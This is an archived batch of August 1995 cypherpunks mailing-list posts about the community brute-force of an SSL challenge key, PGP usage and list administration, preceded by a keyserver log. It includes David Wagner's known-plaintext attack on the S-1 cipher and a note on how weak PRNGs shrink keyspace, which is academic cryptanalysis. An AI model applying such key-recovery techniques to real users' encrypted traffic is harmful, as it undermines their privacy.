95/08/25 14:43:02 12992 204.215.85.69 {0,0} |2 HELO 1 
chrisg@glass.lplizard.com Leaping Lizard Software |3 COMM brc0.14 [lkntvV] |27 
INFO ++ TIMEOUT ||31
95/08/25 14:45:40 12992 18.43.0.184 {0,0} ++ TIMEOUT ||31
95/08/25 14:54:32 12992 128.93.8.124 {0,0} |0 HELO 1 damien.doligez@inria.fr 
Damien Doligez |2 COMM brc0.14 [dlLkt]: brl0.04 ++ TIMEOUT ||31
95/08/25 15:00:28 12992 128.174.241.76 {0,0} ++ TIMEOUT ||31
95/08/25 15:03:19 12992 204.5.89.50 {0,0} |12 HELO 1 duncan@hasp.com Duncan 
|12 COMM brc0.14 [dlLkt]: brl0.04 |13 INFO ++ TIMEOUT ||31
95/08/25 15:03:51 12992 128.93.8.133 {0,0} |24 HELO 1 damien.doligez@inria.fr 
Damien Doligez ++ TIMEOUT ||32
95/08/25 15:05:37 12992 18.43.0.166 {0,0} ++ TIMEOUT ||31
95/08/25 15:06:57 12992 204.215.255.3 {0,0} ++ TIMEOUT ||31
95/08/25 15:07:33 12992 128.2.198.78 {0,0} |1 HELO 1 
hgobioff@GS207.SP.CS.CMU.EDU Howard Gobioff |2 COMM brc0.13 [dlLkt]: brl0.04 
|11 INFO |26 WORK 2977 |29 KEYS 2977 1 ==> 2977 566f 3 ++ TIMEOUT ||32
95/08/25 15:09:55 12992 204.249.46.33 {0,0} |12 HELO 1 mike@uac.net Michael 
|15 COMM brc0.14 [dlLkt]: brl0.04 |22 INFO ++ TIMEOUT ||31
95/08/25 15:14:05 12992 204.215.255.3 {0,0} ++ TIMEOUT ||31
95/08/25 15:16:59 12992 158.152.9.126 {0,0} ++ TIMEOUT ||31
95/08/25 15:17:30 12992 204.5.88.2 {0,0} |20 HELO 1 duncan@hasp.com Duncan J 
Watson ++ TIMEOUT ||31
95/08/25 15:18:08 12992 140.78.101.30 {0,0} |3 HELO 1 
burge@cast.uni-linz.ac.at Mark Burge |8 COMM brc0.08: brloop0.2 ++ TIMEOUT ||31
95/08/25 15:19:02 12992 128.93.8.7 {0,0} |0 HELO 1 damien.doligez@inria.fr 
Damien Doligez |14 COMM brc0.14 [dlLkt]: brl0.04 ++ TIMEOUT ||31






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dhenson@itsnet.com (Don Henson)
Date: Fri, 25 Aug 95 16:07:36 PDT
To: cypherpunks@toad.com
Subject: Over 500 'Munitions T-shirts' Shipped!
Message-ID: <199508252321.RAA02314@scratchy.itsnet.com>
MIME-Version: 1.0
Content-Type: text/plain


We have thus far shipped over 500 of the RSA/Perl Munition T-shirts. 
Orders are still pouring in. Don't be left out. Order your's today. 
(Read some comments of our customers at the end of this post.)

Now you can wear a TSHIRT that has been classified as a MUNITION by the 
US Goverment. That's right! The US International Traffic in Arms 
Regulations (ITAR) makes exporting cyrptographic materials illegal. 
ITAR further defines export as providing cryptographic information to a 
non-US/Canadian citizen even if you are inside the US at the time. 
Providing information is further defined as telling or showing 
information to a non-US/Canadian citizen. The Munitions Tshirt has a 
Perl implementation of the RSA algorithm (the one used by PGP) printed 
on the front along with a bar-code of the same algorithm.

What all the above means is that if you wear the Munitions Tshirt where 
a non-US/Canadian citizen can see it, even if it is inside the US, you 
have just exported cryptographic material (which is already freely 
available outside the US) and have become a criminal in the eyes of the 
US Government. Now you too can become an international arms dealer for 
the price of a tshirt (US$15.95 - US$29.95, depending on size) and the 
guts to wear it.

If you are a non-US/Canadian citizen, you can still own a Munitons 
Tshirt by ordering the tshirt from a source that is outside the US. The 
email response to a request for info (see next paragraph) includes full 
instructions for ordering the tshirt no matter where you live.

For more information on how to own this classic example of civil 
disobedience, just send email to wepinsto@colossus.net with the subject 
of 'SHIRT'. (You don't have to be a US/Canadian citizen to request the 
info.) Or, if you have WWW access, just point your Web browser to:

     http://colossus.net/wepinsto/wshome.html

By the way, 25% of the profits from the sale of the tshirt (in the 
US/Canada) goes to the PHIL ZIMMERMANN LEGAL DEFENSE FUND to help 
defend the author of PGP from harassment and possible prosecution by 
the Fedgoons.

And if you get arrested for wearing the Munitions Tshirt, we'll refund 
your purchase price.  :-)

                          ====++++====++++

Here are some testimonials from a few of our many satisfied customers:

"Got mine this afternoon.  Wooohhaah!!  Already had some folks at
Blockbusters point, mumble to themselves, and then ask me what the
munitions warning meant.  This is going to be fun!!  I'm a cyphernerd
for sure..."

"Thanks for the great T-shirt.  I'm making copies of your paper order 
form for others."

"I think I'll have to wear the shirt over to Logan Airport and hang 
around the International Arrivals terminal a few times.   <G>"

"I received the T-shirt on 8/3.  Thank you, it has been a pleasure 
dealing with you!"

"The first thing that I did after it arrived was to don it and then go
visit the office of one of our visiting researchers from Russia.  :)~"

                          ====++++====++++

Get your Munitions Tshirt now. Who knows how long they'll stay in 
production!

Don Henson, Managing Director (PGP Key ID = 0X03002DC9)
West El Paso Information Network (WEPIN)
Check out The WEPIN Store at URL:
http://colossus.net/wepinsto/wshome.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Fri, 25 Aug 95 15:22:53 PDT
To: Sam Quigley <poodge@econ.Berkeley.EDU>
Subject: Re: random coincidences
In-Reply-To: <199508250707.AAA14271@quesnay.Berkeley.EDU>
Message-ID: <9508252222.AA14188@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Sam Quigley writes
>What are some of the more common "coincidences" and non-random
>correlations that ordinary random number generators (ones found in
>common computer languages that don't take extensive measures to be
>random) have?

The most common one is "linear correlation" between successive
random values.  The typical PRNG supplied with compilers is what's
called a "linear congruential random number generator", which has
something like:

    S0 = (user supplied seed)
    Sn+1 = ( a * Sn + b ) mod c
    Rn = f(n)

The choice of constants a, b, and c are critical to the process.
A decent practical discussion is in "Numerical Recipes in C".

If you take N successive random numbers and interpret them as a
point in an N-dimensional space, then the points generated by the
linear congruential PRNG don't tend to fill up the space as they
would in the "true" random case.  They tend to lie on N-1 dimensional
planes instead, and when a, b, and c are chosen poorly, sometimes
*very* few such planes.

>It seems that there's a lot of fuss about getting very random numbers,
>but unless the numbers produced by ordinary measures have very obvious
>coincidences, maybe it's a big fuss about nothing...?

If NetScape uses such a PRNG to select 40bit keys for SSL, then the
work to be done in brute-force search going on right now might be
*significantly* reduced by knowing the planes on which the numbers
lie.  If the constants are particularly poor, there might be as little
as ten or twelve bits of real key.  You could search that on a *Newton*
in less than an hour or so --- nevermind the MasPars and such being used
in the current project.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Fri, 25 Aug 95 17:42:54 PDT
To: CYPHERPUNKS@toad.com
Subject: SSL CHALLENGE: I told you so....
Message-ID: <8AFD417.000300036F.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


PT> I've been looking at the allocated list of keys, and I notice a possible
PT> problem:  One user has allocated 50,000 segements:
PT>
PT> 0c2b-cf7a NOACK 0c2b 50000 Joe Thomas <jthomas@ogi.com>

                                  -o-

PT> I can't contact the server to request keyspace anymore - I get a
PT> '500 Server error'
PT>
PT> It looks like 12 hours on a P5/90 are going to waste (could have done
PT> 90 segments)

                                  -o-

RL> The bottleneck at the server is pretty awful.  My clients are spending
RL> most of their time in timeout, waiting for keyspace.


<rant>

  As I watch you fumbling for keyspace IN REAL TIME....

  This is a great time for me to say "I told you so" WRT the doling of
keyspace. It is far better to sign up your volunteers, CHECK THE
ALLOCATION, and hand out starting keys, before there is even a challenge
to brute.

  The quad-coverage scheme I outlined before allows sufficient
protection against dropouts (whether accidental or malicious), so that a
single person who asked for some keyspace, but was unable to actually
sweep it, would not hurt the effort.

  Those who fail to ACK (once it is certain that the client does in fact
issue it - should have some parallel means of acking) should have their
allocation, based on my evolving formula

        available_mips = mips * idle_rate * .5**(unacks/sweeps)

for the next challenge reduced, reflecting previous unreliability. Set
up a sign-up period, add up the total available mips, figure the share
that each person should get, and assign keyspace accordingly via direct
Imail to each participant.

       The next level of abstraction is to not only give a start..end
     and direction, as I previously outlined, but supply a scaling
     factor in the challenge release. That way, any late entries can
     automagically be inserted into the keyspace, by squeezing everyone
     according to the final total of available_mips.

  Once the proverbial clock is running, there should be no need to
discuss who will do what. That is what the huddle is for. Or, to string
along the analogy, I guess Steve Young should just go up to the line,
take the ball from center, and then give hand signals to Jerry Rice
while a 300-pound defensive lineman is zeroing in on him, because the
linemen are standing around wondering whom to block.

  Geez. It would be better not to even have a damned keyserver at all,
but to just have everybody pick a random start location, than to do it
this way.

</rant>


 * A child said "Mommy, why is the man with the crown naked?"

 * A child said "Mommy, why is the man with the crown naked?"
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iagoldbe@calum.csclub.uwaterloo.ca>
Date: Fri, 25 Aug 95 14:39:28 PDT
To: Piete.Brooks@cl.cam.ac.uk (Piete Brooks)
Subject: Re: SSL Challenge: Are we in trouble?
In-Reply-To: <"swan.cl.cam.:068530:950825160033"@cl.cam.ac.uk>
Message-ID: <199508252137.RAA18903@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


> [[ PERL gurus out there: how can I avoid the "sh -c" process in
> 	$out = `cmd -a 'arg 1'`;
> ]]
> 

open(CMD, "-|") || exec 'cmd', '-a', 'arg 1';
$out = <CMD>;  ## Gets one line
close(CMD);

Use

$out = join('',<CMD>);

instead of the second line above to get the whole output at once.

---------.. ._ _.------------

Ian Goldberg  University of Waterloo Computer Science Club
iagoldberg@csclub.uwaterloo.ca

unsigned bar(unsigned a){return a?bar(a<<1)<<1|a>a<<1>>1:1>>1;}



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alvin Brattli <alvin@phys.uit.no>
Date: Fri, 25 Aug 95 08:49:07 PDT
To: cypherpunks@toad.com
Subject: brclient for SGI?
Message-ID: <199508251548.RAA26206@geronimo.uit.no>
MIME-Version: 1.0
Content-Type: text/plain



Do any of you other bruters have a copy of the latest brclient
that will actually work on an SGI Challenge with IRIX 5.3?
If you do, please pretty please mail it to me, as my 'biggie',
an 8 processor SGI Challenge is completely idle...


aLViN
--
| Alvin Brattli <alvin@phys.uit.no>         |
| ----------------------------------------- |
| GOD MY HEAD HURTS. Too much thinking      |
| and not enough brain cells. -- Clint Ruin |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Fri, 25 Aug 95 19:06:35 PDT
To: cypherpunks@toad.com
Subject: Re: Billing for internet usage
Message-ID: <ac64304b010210044008@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 5:06 PM 8/1/95, David G. Koontz wrote:
....
>One way would be to perform cooperative billing balances between nodes,
>and allow each node to 'bill upward'.   This means that any two machines
>are more interested in their relative balance than how much money they
>are really spending.   There are some interesting problems of trust and
>reliability, that might be solved through the use of digital money.
....
Ideas like these are discussed in my "Digital Silk Road" paper which is now
accessible as "http://www.webcom.com/~agorics/dsr.html". There may soon
be a PostScript version available.

These are the ideas that I presented at a Cypherpunks meeting about a year ago.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hugh (Hugh Daniel)
Date: Fri, 25 Aug 95 18:45:28 PDT
To: cypherpunks@toad.com
Subject: ADMIN:  You might not be on the list anymore!
Message-ID: <9508260145.AA01411@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


  I want to warn you folks about how the list is run, just so you
don't think that evil is a foot on toad.com.
  Recently the bounce messages for cypherpunks got to be over 80 megs
large, largely due to my being busy.  When I went to clean them and
the offending messages out (only 38 addresses needed to be culled) I
found a lot of bounces from the likes of AOL and MCI that were "user
XXX's mail box is full..." bounces.
  In the past I tryed to ignore these message as it was clear that the
mail boxes would get emptyed at some point.  Now I have seen these
messages from the same address for weeks, and combined with the number
of hours it takes to cull this crud from the list has pushed me into a
new policy.
  I am now deleteing (allmost) all addresses from the list that
generate bounce messages.  If you stop getting cypherpunks email the
FIRST thing to do is ask the majordomo@toad.com mailbot if you are
still on the list, this might looks like:

	To: majordomo@toad.com
	Subject:
	--text follows this line--
	which yourlogin@yourhost.dom

  If you are NOT on the list, just subscribe again and leave it at
that.  Please note that many of the bounce messages came from email to
(local) news group gateways, and while I try to send warning mesages,
it would be better if folks maintaining such gateways made sure that
bounce messages went to the local maintainers insted of me.

  Enjoy the list, and keep it on topic folks!

		||ugh Daniel
		Majordomo Potty Trainer
		hugh@toad.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cg@bofh.lake.de (Cees de Groot)
Date: Fri, 25 Aug 95 09:52:18 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: improving the distributed computation
In-Reply-To: <9508251143.AA15702@all.net>
Message-ID: <m0sm205-000PZjC@bofh.lake.de>
MIME-Version: 1.0
Content-Type: application/x-pgp-message

application/pgp-message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dawagner@tucson.Princeton.EDU (David A. Wagner)
Date: Fri, 25 Aug 95 12:26:54 PDT
To: sci-crypt-research@uunet.uu.net
Subject: Cryptanalysis of S-1
Message-ID: <41l6u3$852@cnn.Princeton.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I just got back from vacation in time to see the brouhaha over S-1.
My, my.  So I'll describe an attack on S-1 which takes 2^32 known
plaintexts and 2^64 operations, assuming that F, G, clear_family,
and cipher_family are known (but arbitrary).  Tradeoffs are possible:
a similar attack breaks S-1 with 2^48 known plaintexts and 2^48 operations.

This adds weight to the hypothesis that S-1 is a hoax (assuming that
the NSA was trying to design a strong cipher!)...

I should point out that this attack works for an arbitrary number
of rounds.  It shows that increasing the number of rounds will never
make S-1 secure.  To fix S-1, the key schedule must be repaired.




Anyhow, here's the attack.  Several people have noted that the
S-1 round keys repeat every 5 rounds.  I'll take advantage of this
with an attack reminiscent of related-key techniques (but I don't
need any related-keys, Mind you!).

If P is a known plaintext, let P_i denote the intermediate block
after i rounds.  I'm going to look for a pair of matching plaintexts
P,Q: a pair for which P_5 = Q_0.  Then we'll have P_{5+j} = Q_j
for all j.  Pictorially:

	P_0
	P_1
	P_2
	P_3
	P_4
	P_5	Q_0
	P_6	Q_1
	...	...
	P_31	Q_26
	P_32	Q_27
		Q_28
		Q_29
		Q_30
		Q_31
		Q_32
	
The birthday paradox says that with 2^32 known plaintexts, there
should be at a matching pair P,Q.  If I can recognize it, I can
exploit it as follows.  Note that (P_0,Q_0) and (P_32,Q_32) are
two known plaintext-ciphertext pairs for 5-round S-1.  These two
known plaintexts for 5-round S-1 are enough to find the 5 round
subkeys by standard methods (since we know the inputs and outputs
to almost all the F boxes in these two examples).

Thus, each pair P,Q will suggest one key value, and the right
(matching) pair will suggest the correct key value (which can be
easily recognized with one trial decryption).  I don't know how
to recognize matching pairs directly, but I can try all 2^32 * 2^32
possible pairs, and I'm guaranteed to find the matching plaintext
pair if there is one after 2^64 trial decryptions.


That's the basic attack.  Here's a sketch of how to trade off
known plaintexts for time.  I'd really like to be able to detect
matching pairs easily, because then I'd be able to use a hash
table (or sorted list) to find a matching pair more efficiently.

So I'll note that I can detect matching pairs pretty accurately
if P,Q are in a particular form.  I'll construct an oracle which
can quickly tell if two plaintext-ciphertext pairs (X,Y) (X',Y')
for 5-round S-1 were enciphered with the same key, if they're in
a special form.

Let A,A' be the 32 bits from X,X' entering the F boxes in round 2;
let B,B' be the 16 bits output from the F boxes in round 2;
let C,D,C',D' be the 16 bits affected by the F boxes in round 2
from X,Y,X',Y' -- so that

	D = C ^ B = C ^ f(A ^ K_2)
	D' = C' ^ B' = C' ^ f(A' ^ K'_2).

If K_2 = K'_2 and A = A', then D ^ C should equal D' ^ C'.
So this is how I'll construct the oracle: it insists that (X,Y)
(X',Y') be of a form so that A = A', and it reports that (X,Y)
(X',Y') were enciphered with the same key when D ^ C = D' ^ C'.
The oracle will always answer correctly if they were enciphered
with the same key, and will answer incorrectly 2^{-16} of the
time when the were enciphered with different keys.

So now we are considering (X,Y) = (P_0,P_5) = (P_0,Q_0) and
(X',Y') = (Q_27,Q_32) = (P_32,Q_32).  The oracle's precondition
means that 32 bits of P_0 equal a corresponding 32 bits of P_32.

The tradeoff attack follows from this.  Get 2^48 known plaintexts.
Consider only those known plaintext-ciphertext pairs (P_0,P_32)
which meet the 32 bit oracle precondition as possibilities for P.
There will be 2^16 possibilities for P.  Let Q range over all 2^48
possibilities.  Then we expect there to be some right matching pair
P,Q: the oracle is guaranteed to detect it, and also another 2^48
wrong pairs.  Each possible pair P,Q will suggest a key value,
so the wrong pairs can be filtered out with a total of 2^48 trial
encryptions, leaving only the right pair and the right key value.

This would seem to require 2^16 * 2^48 oracle computations since
there are 2^16 values for P and 2^48 possibilities for Q.  But
wait: the oracle can be implemented more efficiently as a table
lookup.  Store all 2^16 possibilities for P in a lookup table,
keyed on the 16 bit value D^C used by the oracle.  For each Q,
calculate the 16 bit value D' ^ C' and search in the table for
a matching D ^ C value (which gives you a possible matching pair
P,Q).

This technique requires a total of 2^48 table lookups, 2^48 trial
decryptions, 2^16 space, and 2^48 known plaintexts.  Further tradeoffs
between # of known plaintexts and time appear to be possible...

I've ignored the issue of the G box throughout.  Actually, it does
change the number a little bit -- but just by random luck, the two
G box outputs should match 1 in 2^2 times, so we only need to increase
the complexity of this attack by about 2^2 to account for the G box.
The G box didn't add much strength.

-------------------------------------------------------------------------------
David Wagner                                             dawagner@princeton.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ai05@solo.pipex.com (News Department, New Scientist)
Date: Sat, 26 Aug 95 04:38:16 PDT
Subject: Microsoft Network
Message-ID: <41l7se$hkc_001@dial.pipex.com>
MIME-Version: 1.0
Content-Type: text/plain


This may be the wrong place to pose this question but...
Does anyone have any experience of using the nascent Microsoft Network ? Early 
reports from beta testers say it could be a hackers delight due to the use it 
makes of objects and such like.
Any opinions or does anyone know of any hacks or cracks circulating yet ?
Thanks in advance.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Fri, 25 Aug 95 11:37:57 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: Cypherpunk Brute Squad [Re: SSL Challenge: Server problems]
In-Reply-To: <9508251723.AA18139@cantina.verity.com>
Message-ID: <"swan.cl.cam.:133180:950825183721"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>> PLEASE ensure that you are using a brclient of at least 0.14
>> ("grep comment.inffo brclient" to discover what you are using)
>> You can updare brclient while brloop is running.
>> Some people are still running old versions, and this is hammering the 
server.
>> 
>> It also helps to run at least brloop 0.05 ("grep BRLOOPCOMMENT brloop").
> Unfortunately the web page under "Socket based key doler" points 
> at brclient 0.13 and brloop 0.04.  Could you fix this please:)

I had a similar report before, and it turned out to be an over zealous WWW 
"cache" :-((

HOWEVER: there is now a new brclient 0.17 which should go faster that pre 0.16 
over "slow" links, but shoudl also work over "fast" links (which 0.16 
sometimes did not).  SO: all 0.16 users should upgrade, just in case the link 
goes fast!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Tardieu <sam@inf.enst.fr>
Date: Fri, 25 Aug 95 10:52:08 PDT
To: cypherpunks@toad.com
Subject: Challenge / Anything working ?
Message-ID: <"uAvWc.0.he4.GoWFm"@gargantua>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

<sam@manon:~>telnet sksp.brute.cl.cam.ac.uk 19957
Trying 128.232.0.90...
(then nothing)

Isn't it the right server/port ?

  Sam
- --
"La cervelle des petits enfants, ca doit avoir comme un petit gout de noisette"
                                                       Charles Baudelaire

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAgUBMD4Mi4FdzKExeYBpAQHaMgP+IgjU/SjM6+9rz0sM191xLLrEuCcdeZUL
dVkP2VDTCCQqVCH5PyWWvC1O4bunQVgXaW35g6xmDKnnAiALW3UVRsq0QpiBhcrf
8lKZm6ASZWU8TSEoLrmf/kLvqygW9t72D+ktcXokiLe3OvT6Bs41DhHo8c/3go1u
2G/hylhLV9w=
=Yz3+
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Fri, 25 Aug 95 19:12:45 PDT
To: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Subject: Re: Auto-pgp for pine/elm/tin (fwd)
In-Reply-To: <Pine.3.89.9508252137.H2413-0100000@wane3.scri.fsu.edu>
Message-ID: <199508260212.UAA27830@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> I have PGP installed on my pc and if I want to 
> use it, I can save the message in ascii, then upload it to the server 
> where I have my Internet account, then mail it.


I use PGP on every outgoing message and about 20% of incoming messages.  And
I send/receive a *lot* of messages.  No way I would be able to do a process 
like the above on my mail.


In a few weeks I will be able to get mail on my home computer, but most
(80%?) Internet users will still not have that luxury.


>  maybe not entirely 
> transparent, but at least it seems to me that the convenience of running 
> it on the server with something like Mr. Wilcox's BAP is not worth the 
> added risk.


In my opinion it *is* worth the risk.  I believe that having "BEGIN PGP
SIGNED MESSAGE" in your posts and e-mail is a social good (raising public
awareness of/acceptance of PGP) which is more important than actually
protecting my e-mail from spying/forgery.


>  Besides, how often do you need to use it?  


Public awareness/acceptance, traffic analysis, the "electronic envelope" 
analogy...


If you don't use it, it's not doing any good at all.


Regards,

Bryce

signatures follow:


                                 +                                           
    public key on keyservers     /.       island Life in a chaos sea         
    or via finger 0x617c6db9     /             bryce.wilcox@colorado.edu     
                                 ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMD6C7/WZSllhfG25AQFQ7gP9EX48Bw6mZ5WJYR+4j78oPUL7++Irz39i
b6EbU8ZWUia1AEqSVLmKibIE4JOBejZKzSCCF4OrE7j+BCT1B5hLbIrUZzNNHDQk
pXbfLo51FyIsR4SlCYtWdsMUiAI08ACOAAxtab/3uC2DEO7UB/9A+xALPGNFQWdz
oRnku9NOOY0=
=0uru
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 25 Aug 95 17:11:15 PDT
To: cypherpunks@toad.com
Subject: Progress so far
Message-ID: <9508260011.AA28611@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, we're now about 30 hours into the crack, and here are some
very rough stats.

We've swept a bit over  1/4 of the keyspace. Only 60% of requests have 
been ACKed so far - PLEASE check to make sure your acks have
been recorded.

The largest segments completed are a 128 (mine), and 4 100's
(3 are mine :-) Over 9000 segments have been swept in 3-segment
chunks, by far the most popular size.

I count people from uk, at, se, ee, fr, ie, kr, nl, de, no, au, za, nz, 
fi, ca, be, is, and us, by a casual inspection - I'm sure there are more.

It's pretty clear that the server is the bottleneck, though also looks 
like some people are biting off more than they can chew. I would
have probably swept another couple hundred today if I could have
obtained the key space.

Since a lot of sweepers are not on the cpunk list, notices of
updates and progress would be well put in the /brute/ page.

I'm going away for a week and a half's vacation. I'll try to watch for 
results in sci.crypt, but I probably won't see the cpunk list until I'm 
back.


 Good luck! 


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 25 Aug 95 20:09:03 PDT
To: "Robert A. Hayden" <hugh@toad.com>
Subject: Re: ADMIN: You might not be on the list anymore!
Message-ID: <ac63df1c03021004050c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:14 AM 8/26/95, Robert A. Hayden wrote:

>I administrate several mailing lists.  Bounce as of late have gotten so
>bade, especially from AOL, C$erv, etc (and I expect soon from MSN.COM)
>that I also just nuke the person out of hand.  It's better in the long
>run :-)

I agree. Kill them all. God will know his own.


--Tim the Impaler

(I'm seeing bounces on all Compuserve addresses for the simple Cypherpunks
Santa Cruz I administer manually.)

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Fri, 25 Aug 95 19:28:02 PDT
To: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Subject: Re: Auto-pgp for pine/elm/tin (fwd)
In-Reply-To: <Pine.3.89.9508252137.H2413-0100000@wane3.scri.fsu.edu>
Message-ID: <Pine.LNX.3.91.950825200849.7881B-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 25 Aug 1995, P.J. Ponder wrote:

> Date: Fri, 25 Aug 1995 21:52:47 +0100
> From: P.J. Ponder <ponder@wane-leon-mail.scri.fsu.edu>
> To: hfarkas@ims.advantis.com
> Cc: cypherpunks@toad.com
> Subject: Auto-pgp for pine/elm/tin (fwd)
> 
> 
> In Garfinkel's book, he talks about the risks of running PGP on a 
> multiuser system where others (sys. admins, eg) have higher levels of 
> authority than you do.  I have PGP installed on my pc and if I want to 
> use it, I can save the message in ascii, then upload it to the server 
> where I have my Internet account, then mail it.  maybe not entirely 
> transparent, but at least it seems to me that the convenience of running 
> it on the server with something like Mr. Wilcox's BAP is not worth the 
> added risk.  Besides, how often do you need to use it?  
> --
> pjp

the risks etc of using pgp on a multiuser platforms are well known. 

i'd say it's better to have a pgp signed mesg than an unsigned one.

if you post a lot, or mail a lot, that's a lot of mesgs to sign.
finding a tool to do this more easily than using pgp through the shell
interface is 'a good thing'.

given that, here are some args for signing on a multiuser platform.

often, people (me included) choose to use a separate 'weak' key for 
these purposes.  it's always nice to have some sort of indication that 
that is what the key is for.  i had a key with 'INSECURE KEY!!' tagged 
on the end of my userid.  i had another for secure communications.

now, you can't stop some sysop type person from doing whatever to you.
that's the way it goes.  but, if you've got a really malicious sysop,
they could just spoof you to the world, including making up a key
supposedly from you.  if they posted enough crap using that key people
would begin to think that they are really you or that one of you is
lying and to hell with both of you.  this sort of denial of service
attack is an unlikely event (unlikely for a sysop to do - someone else
is a diff matter).

finally, independent of multiuser platforms, the signing utilities are
quite useful for people like me who have their own personal unix box
on the net.

- -pjf

patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMD6GjE3Qo/lG0AH5AQHazAP/ToRRiftaXDspBAnECzoM1ZexhqKb8Ou/
uxSljS/w3h9yz7+j6bJIbak1CI2JFrTneyj6jKsW/2wCV/p65F+5dvD2a2VUCJ6u
+93zmFHiMS0XhCl3lLutKKlcrZkXC1P1qvY7ozFYoJ5PQ7rqQGfoxUuPisGJ5gJm
XH/kkQSIuis=
=VpN7
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Fri, 25 Aug 95 17:54:34 PDT
To: cypherpunks@toad.com
Subject: Re: SSL CHALLENGE: I told you so....
In-Reply-To: <8AFD417.000300036F.uuout@famend.com>
Message-ID: <199508260054.UAA26805@hammond.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


MONTY HARDER writes:
 >   Geez. It would be better not to even have a damned keyserver at all,
 > but to just have everybody pick a random start location, than to do it
 > this way.

I think this would make an interesting comparison versus the present
system. Maybe the next challenge...?

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 25 Aug 95 19:14:28 PDT
To: Hugh Daniel <hugh@toad.com>
Subject: Re: ADMIN: You might not be on the list anymore!
In-Reply-To: <9508260145.AA01411@toad.com>
Message-ID: <Pine.ULT.3.91.950825211315.13100C-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I administrate several mailing lists.  Bounce as of late have gotten so 
bade, especially from AOL, C$erv, etc (and I expect soon from MSN.COM) 
that I also just nuke the person out of hand.  It's better in the long 
run :-)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMD5nbDokqlyVGmCFAQE5bAP/XP99zqzhOK/5o2lflO5AY/ecAEoQBI0A
Nxj1wTHtWMb5mjuW2zruHSDn/Z2Kk/hQ7aEpEXaLhNtpqdBYe/PnJl/BR84abnT+
JaNP018cFx2VHbAkroQ8XdSYWRQFbgqXbU0z4Ju47oajNHoTMqzEt2ZiR/2pwYBi
XFTtjjjQcU4=
=dPYd
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
